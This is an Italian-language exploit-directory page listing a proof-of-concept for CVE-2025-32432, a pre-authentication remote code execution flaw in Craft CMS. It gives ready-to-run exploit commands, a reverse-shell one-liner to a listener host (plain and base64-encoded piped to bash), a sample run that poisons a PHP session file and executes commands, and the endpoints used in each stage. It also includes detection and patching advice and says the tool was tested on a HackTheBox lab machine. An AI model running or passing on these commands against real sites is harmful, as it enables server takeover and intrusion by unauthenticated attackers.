Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-32432 — Exploit, POC per CVE-2025-32432, CraftCMS2Shell | Kitploit
Strumenti/GitHubGitHub/c0gnit00/cve-2025-32432
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubc0gnit00/cve-2025-32432

CVE-2025-32432

Exploit, POC per CVE-2025-32432, CraftCMS2Shell

Vedi Repository
31 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-32432 Craft CMS PoC di RCE pre-autenticazione

Esecuzione remota di codice critica pre-autenticazione in Craft CMS

Versioni interessate: Craft CMS 3.x, 4.x e 5.x (fino alla 5.6.16)

Info: Questo exploit è testato sulla macchina Orion di HackTheBox

Panoramica

Questo repository contiene un exploit proof-of-concept per CVE-2025-32432, una vulnerabilità critica di esecuzione remota di codice pre-autenticazione in Craft CMS. La vulnerabilità consente a un attaccante non autenticato di eseguire codice PHP arbitrario sul server sfruttando il meccanismo di aggancio dei behavior di Yii2 e l'istanziazione di oggetti PHP tramite la tecnica di override di __class.

Punteggio CVSS: 10.0 (Critico)

Caratteristiche

  • Sfruttamento pre-autenticazione — Nessuna credenziale di accesso richiesta
  • Compatibilità universale — Funziona con Craft CMS 3.x, 4.x e 5.x
  • Scoperta automatica dell'ID asset — Forza bruta gli ID asset validi automaticamente
  • Estrazione del token CSRF — Gestisce automaticamente la protezione CSRF di Craft CMS
  • Fallback del percorso di sessione — Riprova automaticamente percorsi alternativi delle sessioni PHP se il primo fallisce

Requisiti

root@kitploit:~
pip install requests urllib3

Avvio rapido

Esecuzione di comandi di base

root@kitploit:~
python3 exploit.py -u http://target.com -c "id"

Reverse Shell

root@kitploit:~
# Start listener on your machine
penelope -p 4444

# base64 encode the payload
echo 'exec bash -i >& /dev/tcp/10.10.14.31/4444 0>&1' | base64


# Run exploit
python3 exploit.py -u http://orion.htb -c "echo 'ZXhlYyBiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMxLzQ0NDQgMD4mMQo=' | base64 -d | bash"

Salta la forza bruta dell'ID asset (se noto)

root@kitploit:~
python3 exploit.py -u http://target.com -c "whoami" -a 11

Usa un percorso di sessione alternativo

root@kitploit:~
python3 exploit.py -u http://target.com -c "id" \
  -s "/tmp/sess_{}"

Utilizzo

root@kitploit:~
usage: exploit.py [-h] -u URL -c COMMAND [-a ASSET_ID] [-m MAX_ASSET]
                                [-s SESSION_PATH] [-q]

CVE-2025-32432 Craft CMS Pre-Auth RCE Exploit v2

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target URL (e.g., http://target.com)
  -c, --command COMMAND
                        Command to execute
  -a, --asset-id ASSET_ID
                        Known valid asset ID (skip brute-force)
  -m, --max-asset MAX_ASSET
                        Max asset ID to brute-force (default: 300)
  -s, --session-path SESSION_PATH
                        Session file path template (default: /var/lib/php/sessions/sess_{})
  -q, --quiet           Suppress verbose output

Esempio di output

root@kitploit:~
$ python3 exploit.py -u http://orion.htb -c "id"

╔══════════════════════════════════════════════════════════════╗
║  CVE-2025-32432 Craft CMS Pre-Auth RCE PoC v2              ║
║  Target: http://orion.htb                                  ║
║  Command: id                                                  ║
╚══════════════════════════════════════════════════════════════╝

[+] Stage 1: Getting session cookie and CSRF token...
[✓] Session ID: q6458g6g8njeimu59n9l65cu1e
[✓] CSRF Token: ofuxX9FLAA7gSDxLqxYtJGLZVHpPCm...
[+] Stage 2: Poisoning session file with PHP code...
[+] Poison request returned: 200
[✓] Session file poisoned
[+] Stage 3: Brute-forcing asset ID (1-300)...
[✓] Valid asset ID found: 1 (HTTP 200)
[+] Stage 4: Triggering RCE via PhpManager gadget chain...
[+] Target session file: /var/lib/php/sessions/sess_q6458g6g8njeimu59n9l65cu1e
[+] Trigger request returned: 200
[✓] COMMAND OUTPUT:
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================

Fasi dell'exploit

Versioni interessate

BranchInteressateCorretta
3.x3.0.0-RC1 – 3.9.143.9.15+
4.x4.0.0-RC1 – 4.14.144.14.15+
5.x5.0.0-RC1 – 5.6.16

Mitigazione

  1. Aggiorna immediatamente all'ultima versione corretta
  2. Monitora i log per:
    • Più richieste POST a /admin/actions/assets/generate-transform
    • Richieste GET alle pagine admin con parametro a= contenente codice PHP
    • Presenza di campi as nei corpi delle richieste POST
  3. Abilita le regole WAF per bloccare pattern sospetti

Crediti

  • Scoperta originale: Orange Cyberdefense / SensePost
  • Articolo del blog: Indagine su una campagna in-the-wild che utilizza RCE in CraftCMS
  • Autore del PoC: Basato sulla ricerca di SensePost, adattato per HTB/test di penetrazione

Disclaimer

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a scopi di ricerca. L'accesso non autorizzato a sistemi informatici è illegale. Ottieni sempre la dovuta autorizzazione prima di eseguire test.

Licenza

Licenza MIT - Vedi il file LICENSE per i dettagli.

Scarica lo strumento
FaseAzioneEndpointAuth
1Estrai cookie di sessione + token CSRFGET /admin/loginNo
2Inietta payload PHP nel file di sessioneGET /index.php?p=admin/dashboard&a=<PHP>No
3Forza bruta dell'ID asset validoPOST /index.php?p=admin/actions/assets/generate-transformNo
4Innesca RCE tramite gadget PhpManagerPOST /index.php?p=admin/actions/assets/generate-transform&cmd=<CMD>No
5.6.17+